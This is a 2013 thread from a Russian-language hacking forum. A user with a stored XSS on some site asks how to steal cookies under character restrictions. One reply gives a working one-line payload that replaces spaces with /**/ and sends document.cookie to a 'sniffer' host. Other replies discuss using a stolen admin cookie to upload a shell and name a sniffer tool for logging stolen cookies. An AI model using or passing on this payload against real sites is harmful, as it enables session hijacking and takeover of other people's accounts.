HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
Перезагрузить страницу XSS
   
Ответ
Страница 1 из 2 1 2 >
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 30.09.2013, 00:05
Massay
Guest
Сообщений: n/a
Провел на форуме:
4404

Репутация: 0
По умолчанию
Добрый вечер, помогите пожалуйста с информацией. Короче так) В этой области я могу залить любую строчку

Код:
Code:
Вот сюда
Работает активная XSS. Могу вызвать

Код:
Code:
alert('1')
Только вот нужно сформировать как-то строчку чтобы она была в одну строку и без пробела и ".

Как можно воровать куки или получить доступ к сайту не виходя из этих параметров.

За любую информацию буду вам очень благодарен!
 
Ответить с цитированием

  #2  
Старый 30.09.2013, 00:15
M_script
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме:
4512

Репутация: 0
По умолчанию
Вместо пробела "/**/", вместо двойных кавычек одинарные. Пример:

Код:
Code:
(new/**/Image()).src='http://sniffer/?'+document.cookie
 
Ответить с цитированием

  #3  
Старый 30.09.2013, 00:56
Massay
Guest
Сообщений: n/a
Провел на форуме:
4404

Репутация: 0
По умолчанию
Спасибо большое! А можно как-то шелл залить через такие параметры?
 
Ответить с цитированием

  #4  
Старый 30.09.2013, 01:10
d1v
Новичок
Регистрация: 21.02.2009
Сообщений: 3
Провел на форуме:
58401

Репутация: 0
По умолчанию
Цитата:
Сообщение от Massay  
Massay said:
Спасибо большое! А можно как-то шелл залить через такие параметры?
если ты с помощью телепатии узнаешь все параметры админки и сможешь сымитировать заливку шелла, то почему бы и нет.
 
Ответить с цитированием

  #5  
Старый 30.09.2013, 01:13
funny_kaplan
Guest
Сообщений: n/a
Провел на форуме:
16571

Репутация: 0
По умолчанию
Цитата:
Сообщение от Massay  
Massay said:
Спасибо большое! А можно как-то шелл залить через такие параметры?
Если куки админа получишь, который может залить шелл, то да)

А через такие параметры - нет.
 
Ответить с цитированием

  #6  
Старый 30.09.2013, 03:18
Massay
Guest
Сообщений: n/a
Провел на форуме:
4404

Репутация: 0
По умолчанию
Ясно) хотел еще спросить у вас , какой хороший, бесплатный сниффер с возможностю сохранять большое количество логов
 
Ответить с цитированием

  #7  
Старый 07.10.2013, 19:08
Enesey
Guest
Сообщений: n/a
Провел на форуме:
2523

Репутация: 0
По умолчанию
Цитата:
Сообщение от Massay  
Massay said:
Ясно) хотел еще спросить у вас , какой хороший, бесплатный сниффер с возможностю сохранять большое количество логов
Analyzer - самый толковый по моему.
 
Ответить с цитированием

  #8  
Старый 07.10.2013, 19:13
Enesey
Guest
Сообщений: n/a
Провел на форуме:
2523

Репутация: 0
По умолчанию
Ппц, написал ответ не посмотрев на даты *facepalm*
 
Ответить с цитированием

  #9  
Старый 07.10.2013, 19:31
Batmаn
Guest
Сообщений: n/a
Провел на форуме:
3415

Репутация: 0
По умолчанию
а что с датами? неделя всего прошла
 
Ответить с цитированием

  #10  
Старый 08.10.2013, 11:32
Enesey
Guest
Сообщений: n/a
Провел на форуме:
2523

Репутация: 0
По умолчанию
Цитата:
Сообщение от Batmаn  
Batmаn said:
а что с датами? неделя всего прошла
Ну по мне так автор уже забил на тему
 
Ответить с цитированием
Ответ
Страница 1 из 2 1 2 >



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ